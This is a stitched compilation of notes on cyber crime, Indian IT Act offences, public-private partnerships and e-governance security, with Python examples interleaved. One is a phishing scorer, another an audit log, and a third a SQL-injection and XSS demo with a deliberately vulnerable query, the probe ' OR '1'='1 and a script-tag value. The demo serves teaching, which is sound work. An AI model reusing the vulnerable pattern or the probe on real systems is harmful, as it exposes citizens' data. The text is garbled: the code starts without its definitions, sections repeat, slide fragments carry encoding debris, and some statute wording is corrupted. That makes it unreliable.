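class LinkExtractor(HTMLParser):
    """Collect (href, visible text) for every <a> element in an HTML body."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def host_of(url: str) -> str:
    """Hostname of a URL, tolerating a missing scheme ("www.example.test/x")."""
    return (urlparse(url if "://" in url else "http://" + url).hostname or "").lower()


def registrable(host: str) -> str:
    """Crude last-two-labels domain (assumption for the demo; no public-suffix list)."""
    parts = host.split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else host


def score_message(sender: str, subject: str, body_html: str) -> tuple:
    """Return (score, reasons): each phishing indicator found adds one point."""
    reasons = []
    sender_domain = registrable(sender.split("@")[-1].lower())
    parser = LinkExtractor()
    parser.feed(body_html)
    for href, text in parser.links:
        link_host = host_of(href)
        if IPV4.fullmatch(link_host):
            reasons.append(f"link points to a raw IP address ({link_host})")
        if registrable(link_host) != sender_domain:
            reasons.append(f"link host {link_host} is not the sender's domain {sender_domain}")
        if re.match(r"https?://|www\.", text):
            # Visible text looks like a URL: check it agrees with the real target.
            shown = host_of(text)
            if registrable(shown) != registrable(link_host):
                reasons.append(f"link text shows {shown} but goes to {link_host}")
    lowered = f"{subject} {body_html}".lower()
    if any(w in lowered for w in CREDENTIAL_WORDS):
        reasons.append("asks the reader to supply credentials")
    if any(w in lowered for w in URGENCY_WORDS):
        reasons.append("applies time pressure")
    return len(reasons), reasons


# Constructed sample messages (not real mail); .example and 203.0.113.0/24 are reserved.
LEGIT = ("notices@examplebank.example", "Your monthly statement is ready",
         '<p>Log in at <a href="https://online.examplebank.example/statements">'
         'online.examplebank.example</a> when convenient.</p>')
PHISH = ("security@examplebank.example", "Account suspended: verify your account immediately",
         '<p>Enter your username and password at '
         '<a href="http://203.0.113.7/login">https://online.examplebank.example/login</a> '
         'within 24 hours.</p>')

if __name__ == "__main__":
    for msg in (LEGIT, PHISH):
        print(score_message(*msg))  # LEGIT scores 0, PHISH scores 5
```

Note that the phishing sample keeps the bank's own address in the sender field: "From" is trivially forged, which is why the scorer anchors on where the links actually go rather than on who the mail claims to be from.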

Cyber Stalking

Cyber Stalking is the use of the Internet or other electronic means to stalk someone. This term is used interchangeably with online harassment and online abuse. Stalking generally involves harassing or threatening behaviour that an individual engages in repeatedly, such as following a person, appearing at a person's home or place of business, making harassing phone calls, leaving written messages or objects, or vandalizing a person's property.

Vishing

Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access to private personal and financial information from the public for the purpose of financial reward. The term is a combination of "voice" and "phishing". Vishing exploits the public's trust in landline telephone services. Vishing is typically used to steal credit card numbers or other information used in identity theft schemes from individuals.

A rapidly growing online user base

• 121 million Internet users
• 65 million active Internet users, up by 28% from 51 million in 2010
• 50 million users shop online on e-commerce and online shopping sites
• 46+ million social network users
• 346 million mobile users had subscribed to data packages

CYBER LAW

(1) Whoever, with the intent to cause or knowing that he is likely to cause wrongful loss or damage to the public or any person, destroys or deletes or alters any information residing in a computer resource, or diminishes its value or utility, or affects it injuriously by any means, commits hacking.

(2) Whoever commits hacking shall be punished with imprisonment up to three years, or with fine which may extend up to two lakh rupees, or with both.

Whoever, without permission of the owner of the computer:

• secures access;
• downloads, copies or extracts any data, computer database or any information;
• introduces or causes to be introduced any virus or contaminant;
• disrupts or causes disruption;
• denies or causes denial of access to any person;
• provides any assistance to any person to facilitate access;
• charges the services availed of by a person to the account of another person by tampering with or manipulating any computer, computer system or computer network;

shall be liable to pay damages by way of compensation not exceeding one crore rupees to the person so affected.

Section 43

• destroys, deletes or alters any information residing in a computer resource, or diminishes its value or utility, or affects it injuriously by any means;
• steals, conceals, destroys or alters, or causes any person to steal, conceal, destroy or alter, any computer source code used for a computer resource with an intention to cause damage.

"If any person dishonestly or fraudulently does any act referred to in section 43, he shall be punishable with imprisonment for a term which may extend to two three years or with fine which may extend to five lakh rupees or with both." [S66]

S 66A - Punishment for sending offensive messages through communication service, etc.

Any person who sends, by means of a computer resource or a communication device:

• any information that is grossly offensive or has menacing character; or
• any information which he knows to be false, but for the purpose of causing annoyance, inconvenience, danger, obstruction, insult, injury, criminal intimidation, enmity, hatred or ill will, persistently makes by making use of such computer resource or a communication device; or
• any electronic mail or electronic mail message for the purpose of causing annoyance or inconvenience or to deceive or to mislead the addressee or recipient about the origin of such messages,

shall be punishable with imprisonment for a term which may extend to three years and with fine.

S 66C - Punishment for identity theft

"Whoever, fraudulently or dishonestly, makes use of the electronic signature, password or any other unique identification feature of any other person, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to rupees one lakh."

S 66D - Punishment for cheating by personation by using computer resource

"Whoever, by means of any communication device or computer resource, cheats by personation, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to one lakh rupees."

S 66E - Punishment for violation of privacy

"Whoever intentionally or knowingly captures, publishes or transmits the image of a private area of any person without his or her consent, under circumstances violating the privacy of that person, shall be punished with imprisonment which may extend to three years or with fine not exceeding two lakh rupees, or with both."

S 67 A - Punishment for publishing or transmitting of material containing sexually explicit act, etc. in electronic form

"Whoever publishes or transmits or causes to be published or transmitted in the electronic form any material which contains sexually explicit act or conduct shall be punished on first conviction with imprisonment of either description for a term which may extend to five years and with fine which may extend to ten lakh rupees."

S 67 C - Preservation and Retention of information by intermediaries

"(1) Intermediary shall preserve and retain such information as may be specified for such duration and in such manner and format as the Central Government may prescribe.

(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub-section (1) shall be punished with an imprisonment for a term which may extend to three years and shall also be liable to fine."

IT ACT

The Information Technology Act, 2000 (also known as ITA-2000 or the IT Act) is an Act of the Indian Parliament (No 21 of 2000) notified on October 17, 2000. This act is being opposed by the Save Your Voice campaign and other civil society organizations in India. The user-review and consumer social networking site MouthShut.com has filed a writ petition in the Supreme Court of India to repeal and nullify parts of the IT Act 2000.

The United Nations General Assembly, by resolution A/RES/51/162 dated 30 January 1997, adopted the Model Law on Electronic Commerce adopted by the United Nations Commission on International Trade Law. This is referred to as the UNCITRAL Model Law on E-Commerce. Following the UN Resolution, India passed the Information Technology Act 2000 in May 2000, which came into force on October 17, 2000. The Information Technology Act 2000 has been substantially amended through the Information Technology (Amendment) Act 2008, which was passed by the two houses of the Indian Parliament on December 23 and 24, 2008. It got Presidential assent on February 5, 2009 and came into force on October 27, 2009. The amended Act has provided additional focus on information security. It has added several new sections on offences including cyber terrorism and data protection. A set of Rules related to sensitive personal information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was notified in April 2011.

Provisions

The Information Technology Act 2000 consisted of 94 sections segregated into 13 chapters. Four schedules form part of the Act. In the 2008 version of the Act there are 124 sections (excluding 5 sections that have been omitted from the earlier version) and 14 chapters. Schedules I and II have been replaced; Schedules III and IV are deleted.

The Information Technology Act 2000 addressed the following issues:

1 Legal recognition of electronic documents
2 Legal recognition of digital signatures
3 Offences and contraventions
4 Justice dispensation systems for cybercrimes

Offences

Section 65
Offence: Tampering with computer source documents: intentional concealment, destruction or alteration of source code when the computer source code is required to be kept or maintained by law for the time being in force.
Punishment: Imprisonment up to three years or/and with fine up to 2 lakh rupees.

Section 66
Offence: Hacking.
Punishment: Imprisonment up to three years or/and with fine up to 5 lakh rupees.

Section 66-A
Offence: Sending offensive message through electronic means: sending any information through an electronic message that is grossly offensive or has menacing character and might cause insult, injury, criminal intimidation, enmity, hatred or ill will, etc., or sending such mail intended to deceive or to mislead the addressee or recipient about the origin of such messages.
Punishment: Imprisonment up to three years and with fine.

Criticisms

The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December 2008 with no discussion in the House. Some of the cyber law observers have criticized the amendments on the ground of lack of legal and procedural safeguards to prevent violation of civil liberties of Indians. There has also been appreciation of the amendments from many observers because they address the issue of cyber security.

Section 69 empowers the Central Government/State Government and its authorized agency to intercept, monitor or decrypt any information generated, transmitted, received or stored in any computer resource if it is necessary or expedient so to do in the interest of the sovereignty or integrity of India, defence of India, security of the State, friendly relations with foreign States or public order, or for preventing incitement to the commission of any cognizable offence, or for investigation of any offence. They can also secure assistance from computer personnel in decrypting data (see mandatory decryption) under penalty of imprisonment.

Section 66A is widely criticized. It has led to numerous abuses reported by the press. Section 66A has also been criticised and challenged in the Lucknow and Madras High Courts for its constitutional validity. Based on Section 66A, the Bombay High Court has held that creating a website and storing false information on it can entail cyber crime.


organization and the employee Use of ICT tools helps in making these interactions fast

and efficient on the one hand and increase satisfaction levels of employees on the other

Difference between G2B and B2G

Government to business (G2B)- Refers to the conducting of transactions between

government bodies and business via internet

Business to government (B2G)- Professional affairs conducted between companies and

regional municipal or federal governing bodies B2G typically encompasses the

determination and evaluation of proposal and completion of contract

PUBLIC PRIVATE PARTNERSHIPS

bull Agreement between Government and the Private Sector for the Provision of a Public

Good or Service by the Latter

bull Generally but not always involving

ndash Long Term Contracts

ndash User Charges andor Payments flowing between the Parties

ndash Shared Investments but Mainly Private

PREPARED BY ARUN PRATAP SINGH 46

46

ndash Risk Sharing by the Parties

bull Must be a Partnership

A public-private partnership exists when public sector agencies (federal state or local) join with

private sector entities (companies foundations academic institutions or citizens) and enter into a

business relationship to attain a commonly shared goal that also achieves objectives of the

individual partners

Why do them

bull Fiscal Head Room

bull As a Way of Financing the Project

bull Separate Policy amp Regulation from Operations

PREPARED BY ARUN PRATAP SINGH 47

47

bull Make the Good or Service Available

bull Pay for Performance and Output

bull Introduce Competition ndash For and In the Market

PREPARED BY ARUN PRATAP SINGH 48

48

The Need to Set the Right Priorities ndash

Four Basic Dimensions of P3

Although each is unique all P3rsquos include four basic characteristics

Shared goals

Shared resources (time money expertise people)

Shared risks

Shared benefits

Benefits

Expedited project completion

Project cost savings

Improved quality

Use of private resources

Access to new sources of private capital

Two Major Steps

PREPARED BY ARUN PRATAP SINGH 49

49

Crafting the Partnership

Implementing the Partnership

Project Management -

Six Distinct Phases

Genesis

Whatrsquos the need

Whatrsquos driving the need rationale

Facility non-compliance natural disaster budget deficit

Is there a need for a PublicPrivate Partnership

PREPARED BY ARUN PRATAP SINGH 50

50

Preliminary Project Definition

Feasibility

Is a PublicPrivate Partnership feasible not only financially but practically Can it be

done

Market Research

EconomicFinancial Analysis

Program Budget and Schedule

Risk Analysis

Plan and Test

Final project definition

What is the best way to complete the project

Has the plan been thoroughly tested to assess market demand public and stakeholder

feedback and economics

Master ScheduleBudget

Political Climate

Any potential ldquofatal flawsrdquo that could derail the project

Procurement and Contracting

How do you choose and contract with the best-value private partner

Whatrsquos the best delivery method

Design-Bid-Build

Design-Build

Finance-Design-Build

What do current statutes allow

Procurement Approach

Sole Source RFP Low Bid

Risk Allocation between Public and private Partners

Structuring of ContractRisks and Rewards

PREPARED BY ARUN PRATAP SINGH 51

51

Implement

Environmental

Design

Permitting

Construction

Commissioning and Administration

Operate

Startup

Monitoring

Assessment

Enhancement

Contract Modifications

Contract Renegotiations

READINESS IN E-GOVERNANCE

A high level of readiness to develop and implement e-government services is a prerequisite for a high-performing and innovative public sector that delivers integrated services, making life easier for citizens and businesses. E-government readiness is therefore a significant indicator of whether a country is prepared to harvest the efficiencies gained from ICT-enabled public administrations.

The UN's e-government readiness index is a combined indicator of the supply of, potential demand for, and maturity of e-government services. OECD member countries exhibit a high capacity to develop and implement e-government services. This is generally characterized by an extensive broadband infrastructure, a repository of electronic information on government laws and policies (including links to archived information and downloadable forms), and a high level of comfort with ICT among citizens and businesses. Countries with the highest readiness index also tend to have a large number of transactional and e-commerce features on their government websites. As noted by the UN in its 2008 e-government survey, the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (e.g. the accessibility and penetration of the electronic infrastructure) and strategies (e.g. the online provision of services). Each country has two main government websites: one that is informative and another that is a gateway for e-government services. In addition, citizens and businesses are able to access many services and complete many transactions online. However, similar levels of e-government readiness can also result from different strategic approaches.

Internet access is a prerequisite for citizens and businesses to use e-government services, and thus a leading indicator of a country's readiness to harness the potential efficiencies of ICT. Broadband penetration has increased dramatically in most OECD member countries in the past five years, as countries have made significant investments in their telecommunications infrastructure.

SECURITY ISSUES IN E-GOVERNANCE

1. INTRODUCTION

The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions. In particular, the networking potential offered by the Internet and related technologies has the potential to transform the structures and operation of government.

The effective management of information security is a key factor, as the willingness of the different users (citizens and other parties) to use e-Government services will depend heavily on the trust they have in the data security of the service.

2. INFORMATION SECURITY

A central challenge of e-Government services is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens.

The process approach of an information security management system (ISMS) encourages its users to emphasize the importance of:

- understanding an organization's information security requirements and the need to establish a policy and objectives for information security;
- implementing and operating controls to manage an organization's information security risks in the context of the organization's overall business risks;
- monitoring and reviewing the performance and effectiveness of the ISMS; and
- continual improvement based on objective measurement.

Data security rests on a set of security requirements:

- Authentication: the capability to identify who is using the services (a person or a software program); the process of verifying that you are who you say you are.
- Authorization: the capability to grant rights of access to resources; the process of verifying that someone has the rights to do what she is trying to do.
- Confidentiality: the capability to prevent unauthorized access to information.
- Integrity: the capability to prevent unauthorized modification of information, ensuring that information can be relied upon and is accurate and complete.
- Traceability: the capability to chronologically relate any transaction to the person or system that performed the action, in a way that is verifiable.
- Non-repudiation: the capability to prevent a person or system that took part in an event or action from denying or disputing their participation in it.

Examples of organizational and technical measures to prevent unauthorized access and processing are:

- Protecting premises, equipment and systems software, including input-output units.
- Protecting software applications used to process personal data.
- Preventing unauthorized access to personal data during transmission, including transmission via telecommunication means and networks.
- Ensuring effective methods of blocking, destruction, erasure or anonymization of personal data.
- Enabling subsequent determination of when individual personal data were entered into a filing system, used or otherwise processed, and of the person responsible, for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data.
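As an added example (not from the lecture notes), a small hash-chained audit trail that serves the Integrity and Traceability requirements above and the last measure listed, that is, determining later when a personal-data record was entered or used and by whom; the entry fields, actor ids, record ids and timestamps are constructed for illustration.

```python
"""Added example, not from the lecture notes: a hash-chained audit trail that
records who did what to a personal-data record and when (Traceability) and
detects later alteration or deletion of entries (Integrity). Field names, actor
ids, record ids and timestamps are constructed for illustration."""
import hashlib
import json
from dataclasses import dataclass, asdict

GENESIS_HASH = "0" * 64  # previous-hash value used by the first entry


@dataclass
class AuditEntry:
    seq: int            # position in the log, starting at 0
    timestamp: str      # ISO 8601 time supplied by the caller
    actor: str          # authenticated user or system that performed the action
    action: str         # e.g. "create", "read", "update", "erase"
    record_id: str      # identifier of the personal-data record touched
    prev_hash: str      # entry_hash of the previous entry (chains the log)
    entry_hash: str     # SHA-256 over all the fields above


def _digest(fields):
    """Hash a canonical JSON encoding so equal fields always give an equal hash."""
    canonical = json.dumps(fields, sort_keys=True, separators=(",", ":"))
    return hashlib.sha256(canonical.encode("utf-8")).hexdigest()


class AuditLog:
    def __init__(self):
        self.entries = []

    def append(self, timestamp, actor, action, record_id):
        """Add an entry whose hash covers its own fields and the previous hash."""
        prev = self.entries[-1].entry_hash if self.entries else GENESIS_HASH
        fields = {"seq": len(self.entries), "timestamp": timestamp, "actor": actor,
                  "action": action, "record_id": record_id, "prev_hash": prev}
        entry = AuditEntry(**fields, entry_hash=_digest(fields))
        self.entries.append(entry)
        return entry

    def verify(self):
        """Recompute every hash and follow the chain.
        Returns (True, None) if intact, else (False, seq of the first bad entry).
        Editing a field, reordering, or deleting an entry all break the chain;
        truncating the tail does not, so the latest hash must also be kept
        somewhere the log writer cannot change (e.g. a separate system)."""
        prev = GENESIS_HASH
        for position, entry in enumerate(self.entries):
            fields = asdict(entry)
            stored_hash = fields.pop("entry_hash")
            if (entry.seq != position or entry.prev_hash != prev
                    or _digest(fields) != stored_hash):
                return False, position
            prev = stored_hash
        return True, None

    def history(self, record_id):
        """Traceability: the (when, who, what) trail for one record, in order."""
        return [(e.timestamp, e.actor, e.action)
                for e in self.entries if e.record_id == record_id]


def demo():
    """Build a small log, tamper with one entry, and report what verify() finds."""
    log = AuditLog()
    log.append("2024-01-10T09:00:00Z", "clerk17", "create", "PD-42")
    log.append("2024-01-10T09:05:00Z", "clerk17", "update", "PD-42")
    log.append("2024-01-11T14:30:00Z", "officer3", "read", "PD-42")
    before = log.verify()                       # (True, None)
    log.entries[1].actor = "someone_else"       # rewrite who made the update
    after = log.verify()                        # (False, 1)
    return before, after


if __name__ == "__main__":
    print(demo())
```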

Although trusted security and privacy measures constitute a crucial success factor for e-Government, this has not yet been addressed: the UN 2012 Survey shows that only 20% of national portals clearly indicate the presence of security features. Europe is leading, with 44 countries displaying secure links on their national websites, but the survey does not consider regional and local websites, nor the many decentralized public organization web portals.

3. INFORMATION SECURITY THREATS

Services provided by e-Government to citizens, enterprises, public officers, government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats. Documented examples include attacks that use techniques such as packet sniffers, probes, malware, attacks on the Internet infrastructure, denial of service attacks, remote-to-local attacks and user-to-root attacks. The successful adoption of an ISMS is important to protect information assets, allowing an organization to:

- achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis;
- maintain a structured and comprehensive framework for identifying and assessing information security risks, selecting and applying applicable controls, and measuring and improving their effectiveness;
- continually improve its control environment; and
- effectively achieve legal and regulatory compliance.

There are simple and well-known web application vulnerabilities that could be avoided, but e-Government websites are still vulnerable. One research study found 816 e-Government websites from 212 different countries that were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection. A SQL injection attack can compromise data integrity, while XSS is a vulnerability that attackers may exploit to steal users' information.
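As an added example (not from the lecture notes or from the study cited), the two vulnerabilities named above, each as a vulnerable function beside its hardened form, run against a constructed in-memory table of portal applications; the table layout and the sample rows are assumptions.

```python
"""Added example, not from the lecture notes: SQL injection and XSS in an
e-Government portal lookup, each shown as a vulnerable function beside the
hardened one. The applications table and its rows are constructed sample data."""
import html
import sqlite3

# Constructed sample data: a citizen-application table such as a portal might keep.
SAMPLE_ROWS = [
    ("APP-1001", "Asha Verma", "approved"),
    ("APP-1002", "Ravi Kumar", "pending"),
    # An applicant name that contains markup: harmless once escaped on output.
    ("APP-1003", "<script>alert(1)</script>", "pending"),
]


def make_db():
    """Create an in-memory SQLite database holding the sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE applications (app_id TEXT, applicant TEXT, status TEXT)")
    conn.executemany("INSERT INTO applications VALUES (?, ?, ?)", SAMPLE_ROWS)
    conn.commit()
    return conn


def lookup_vulnerable(conn, app_id):
    """Builds the query by string concatenation, so the caller's input becomes
    part of the SQL text. A tautology such as ' OR '1'='1 widens the WHERE
    clause and returns every applicant's record (a confidentiality failure);
    with drivers that accept stacked statements the same flaw can alter data,
    the integrity failure the text mentions."""
    query = ("SELECT app_id, applicant, status FROM applications "
             "WHERE app_id = '" + app_id + "'")
    return conn.execute(query).fetchall()


def lookup_safe(conn, app_id):
    """Parameterised query: the driver binds app_id as a value, never as SQL
    text, so the same input simply matches no row."""
    query = "SELECT app_id, applicant, status FROM applications WHERE app_id = ?"
    return conn.execute(query, (app_id,)).fetchall()


def render_vulnerable(row):
    """Reflects stored fields into HTML unescaped: stored XSS if a field holds markup."""
    app_id, applicant, status = row
    return f"<li>{app_id}: {applicant} ({status})</li>"


def render_safe(row):
    """Escapes every field for an HTML text context before interpolation."""
    app_id, applicant, status = (html.escape(str(v), quote=True) for v in row)
    return f"<li>{app_id}: {applicant} ({status})</li>"


def demo():
    """Run both lookups with a tautology input and both renderers; return the results."""
    conn = make_db()
    probe = "' OR '1'='1"
    return {
        "vulnerable_rows": len(lookup_vulnerable(conn, probe)),  # 3: every record leaks
        "safe_rows": len(lookup_safe(conn, probe)),              # 0: treated as a literal id
        "vulnerable_html": render_vulnerable(SAMPLE_ROWS[2]),
        "safe_html": render_safe(SAMPLE_ROWS[2]),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```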

Specific security measures like firewalls, intrusion detection software, encryption and secure networks must be defined, designed and implemented for government agencies to provide the appropriate levels of security. But information security must also take into consideration the people and processes that rely on the systems. Employees with daily access to e-Government systems must be trained in cybersecurity, and this aspect must become part of their job. A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies.


CYBER CRIME AND LAWS

The expression 'Crime' is defined as an act which subjects the doer to legal punishment, or any offence against morality, social order, or any unjust or shameful act. "Offence" is defined in the Code of Criminal Procedure to mean an act or omission made punishable by any law for the time being in force.

Cyber Crime is emerging as a serious threat. Worldwide, governments, police departments and intelligence units have started to react.

Cyber Crime is a term used to broadly describe criminal activity in which computers or computer networks are a tool, a target, or a place of criminal activity, and it includes everything from electronic cracking to denial of service attacks. It is also used to include traditional crimes in which computers or networks are used to enable the illicit activity.

Computer crime mainly consists of unauthorized access to computer systems, data alteration, data destruction, and theft of intellectual property. Cyber crime in the context of national security may involve hacking, traditional espionage, or information warfare and related activities.

Pornography, threatening email, assuming someone's identity, sexual harassment, defamation, spam and phishing are some examples where computers are used to commit crime, whereas viruses, worms, industrial espionage, software piracy and hacking are examples where computers become the target of crime.

Cyber Crime Variants

Hacking

Hacking is a crime which entails cracking systems and gaining unauthorized access to the data stored in them. Hacking witnessed a 37 per cent increase this year.

Cyber Squatting

Cyber Squatting is the act of registering a famous domain name and then selling it for a fortune. This is an issue that has not been tackled in the IT Act 2000.

Phishing

Phishing is just one of the many frauds on the Internet that try to fool people into parting with their money. Phishing refers to the receipt of unsolicited emails by customers of financial institutions, requesting them to enter their username, password or other personal information to access their account for some reason. The fraudster then has access to the customer's online bank account and to the funds contained in that account.

Cyber Stalking

Cyber Stalking is the use of the Internet or other electronic means to stalk someone. This term is used interchangeably with online harassment and online abuse. Stalking generally involves harassing or threatening behaviour that an individual engages in repeatedly, such as following a person, appearing at a person's home or place of business, making harassing phone calls, leaving written messages or objects, or vandalizing a person's property.


Vishing

Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access to private personal and financial information from the public for the purpose of financial reward. The term is a combination of "voice" and "phishing". Vishing exploits the public's trust in landline telephone services. Vishing is typically used to steal credit card numbers or other information used in identity theft schemes from individuals.

A rapidly growing online user base:

- 121 million Internet users
- 65 million active Internet users, up by 28% from 51 million in 2010
- 50 million users shop online on e-commerce and online shopping sites
- 46+ million social network users
- 346 million mobile users had subscribed to data packages


CYBER LAW

(1) Whoever, with the intent to cause or knowing that he is likely to cause wrongful loss or damage to the public or any person, destroys or deletes or alters any information residing in a computer resource, or diminishes its value or utility, or affects it injuriously by any means, commits hack.

(2) Whoever commits hacking shall be punished with imprisonment up to three years, or with fine which may extend up to two lakh rupees, or with both.

Whoever, without permission of the owner of the computer:

- secures access;
- downloads, copies or extracts any data, computer database or any information;
- introduces or causes to be introduced any virus or contaminant;
- disrupts or causes disruption;
- denies or causes denial of access to any person;
- provides any assistance to any person to facilitate access;
- charges the services availed of by a person to the account of another person by tampering with or manipulating any computer, computer system or computer network;

shall be liable to pay damages by way of compensation not exceeding one crore rupees to the person so affected.

Section 43

- Destroys, deletes or alters any information residing in a computer resource, or diminishes its value or utility, or affects it injuriously by any means.
- Steals, conceals, destroys or alters, or causes any person to steal, conceal, destroy or alter, any computer source code used for a computer resource with an intention to cause damage.

"If any person, dishonestly or fraudulently, does any act referred to in section 43, he shall be punishable with imprisonment for a term which may extend to three years, or with fine which may extend to five lakh rupees, or with both." [S66]

S 66A - Punishment for sending offensive messages through communication service, etc.

Any person who sends, by means of a computer resource or a communication device:

- any information that is grossly offensive or has menacing character; or
- any information which he knows to be false, but for the purpose of causing annoyance, inconvenience, danger, obstruction, insult, injury, criminal intimidation, enmity, hatred or ill will, persistently makes by making use of such computer resource or a communication device; or
- any electronic mail or electronic mail message for the purpose of causing annoyance or inconvenience, or to deceive or to mislead the addressee or recipient about the origin of such messages,

shall be punishable with imprisonment for a term which may extend to three years and with fine.

S 66C - Punishment for identity theft

"Whoever, fraudulently or dishonestly, makes use of the electronic signature, password or any other unique identification feature of any other person, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to rupees one lakh."

S 66D - Punishment for cheating by personation by using computer resource

"Whoever, by means of any communication device or computer resource, cheats by personation, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to one lakh rupees."

S 66E - Punishment for violation of privacy

"Whoever, intentionally or knowingly, captures, publishes or transmits the image of a private area of any person without his or her consent, under circumstances violating the privacy of that person, shall be punished with imprisonment which may extend to three years or with fine not exceeding two lakh rupees, or with both."

S 67A - Punishment for publishing or transmitting of material containing sexually explicit act, etc. in electronic form

"Whoever publishes or transmits or causes to be published or transmitted in the electronic form any material which contains sexually explicit act or conduct shall be punished on first conviction with imprisonment of either description for a term which may extend to five years and with fine which may extend to ten lakh rupees."

S 67C - Preservation and retention of information by intermediaries

"(1) Intermediary shall preserve and retain such information as may be specified for such duration and in such manner and format as the Central Government may prescribe.

(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub-section (1) shall be punished with an imprisonment for a term which may extend to three years and shall also be liable to fine."


IT ACT

The Information Technology Act 2000 (also known as ITA-2000 or the IT Act) is an Act of the Indian Parliament (No. 21 of 2000) notified on October 17, 2000. This act is being opposed by the Save Your Voice campaign and other civil society organizations in India. The user-review and consumer social networking site MouthShut.com has filed a writ petition in the Supreme Court of India to repeal and nullify parts of the IT Act 2000.

The United Nations General Assembly, by resolution A/RES/51/162 dated 30 January 1997, adopted the Model Law on Electronic Commerce adopted by the United Nations Commission on International Trade Law. This is referred to as the UNCITRAL Model Law on E-Commerce. Following the UN Resolution, India passed the Information Technology Act 2000 in May 2000, which came into force on October 17, 2000. The Information Technology Act 2000 has been substantially amended through the Information Technology (Amendment) Act 2008, which was passed by the two houses of the Indian Parliament on December 23 and 24, 2008. It got the Presidential assent on February 5, 2009 and came into force on October 27, 2009. The amended Act has provided additional focus on information security. It has added several new sections on offences, including cyber terrorism and data protection. A set of Rules related to sensitive personal information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was notified in April 2011.

Provisions:

The Information Technology Act 2000 consisted of 94 sections segregated into 13 chapters. Four schedules form part of the Act. In the 2008 version of the Act there are 124 sections (excluding 5 sections that have been omitted from the earlier version) and 14 chapters. Schedules I and II have been replaced; Schedules III and IV are deleted.

The Information Technology Act 2000 addressed the following issues:

1. Legal recognition of electronic documents
2. Legal recognition of digital signatures
3. Offences and contraventions
4. Justice dispensation systems for cybercrimes

Offences:

Section | Offence | Punishment
65 | Tampering with computer source documents - intentional concealment, destruction or alteration of source code when the computer source code is required to be kept or maintained by law for the time being in force | Imprisonment up to three years, or/and with fine up to 2 lakh rupees
66 | Hacking | Imprisonment up to three years, or/and with fine up to 5 lakh rupees
66-A | Sending offensive message through electronic means - sending any information through an electronic message that is grossly offensive or has menacing character and might cause insult, injury, criminal intimidation, enmity, hatred or ill will, etc., or sending such mail intended to deceive or to mislead the addressee or recipient about the origin of such messages | Imprisonment up to three years and with fine

Criticisms:

The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December 2008 with no discussion in the House. Some cyber law observers have criticized the amendments on the ground of a lack of legal and procedural safeguards to prevent violation of the civil liberties of Indians. There has also been appreciation of the amendments from many observers because they address the issue of cyber security.

Section 69 empowers the Central Government/State Government or its authorized agency to intercept, monitor or decrypt any information generated, transmitted, received or stored in any computer resource if it is necessary or expedient so to do in the interest of the sovereignty or integrity of India, defence of India, security of the State, friendly relations with foreign States or public order, or for preventing incitement to the commission of any cognizable offence, or for investigation of any offence. They can also secure assistance from computer personnel in decrypting data (see mandatory decryption) under penalty of imprisonment.

Section 66A is widely criticized. It has led to numerous abuses reported by the press. Section 66A has also been criticised and challenged in the Lucknow and Madras High Courts for its constitutional validity. Based on Section 66A, the Bombay High Court has held that creating a website and storing false information on it can entail cyber crime.


Risk Allocation between Public and private Partners

Structuring of ContractRisks and Rewards

PREPARED BY ARUN PRATAP SINGH 51

51

Implement

Environmental

Design

Permitting

Construction

Commissioning and Administration

Operate

Startup

Monitoring

Assessment

Enhancement

Contract Modifications

Contract Renegotiations

READINESS IN E-GOVERNANCE

A high level of readiness to develop and implement e-government services is a prerequisite for a high--performing and innovative public sector that delivers integrated services making life easier for citizens and businesses E-government readiness is therefore a -significant indicator of whether a country is prepared to harvest efficiencies gained from ICT-enabled public administrations

The UNs e-government readiness index is a combined indicator of the supply of potential demand for and maturity of e-government services OECD member countries exhibit a high capacity to develop and implement e-government services This is generally characterized by an extensive broadband infrastructure a repository of electronic information on government laws and policies including links to archived information and downloadable forms and a high level of comfort with ICT by citizens and businesses Countries with the highest readiness index tend to also have a large amount of transactional and e-commerce features on their government websites As noted by the UN in its 2008 e-government survey the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (eg the accessibility and penetration of the electronic infrastructure) and strategies (eg the online provision of services) Each country has two main government websites one that is informative and another that is a gateway for e-government services In addition citizens and businesses are able to access many services and complete many transactions online However similar levels of e-government readiness can also result from different strategic approaches

Internet access is a prerequisite for citizens and businesses to use e-government services and thus a leading indicator of countries readiness to harness the potential efficiencies of ICT Broadband penetration has increased dramatically in most OECD member countries in the past

PREPARED BY ARUN PRATAP SINGH 52

52

five years as countries have made significant investments in their telecommunications infrastructure

SECURITY ISSUES IN E-GOVERNANCE

1 INTRODUCTION The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions In particular the networking potential offered by the Internet and related technologies have the potential to transform the structures and operation of government

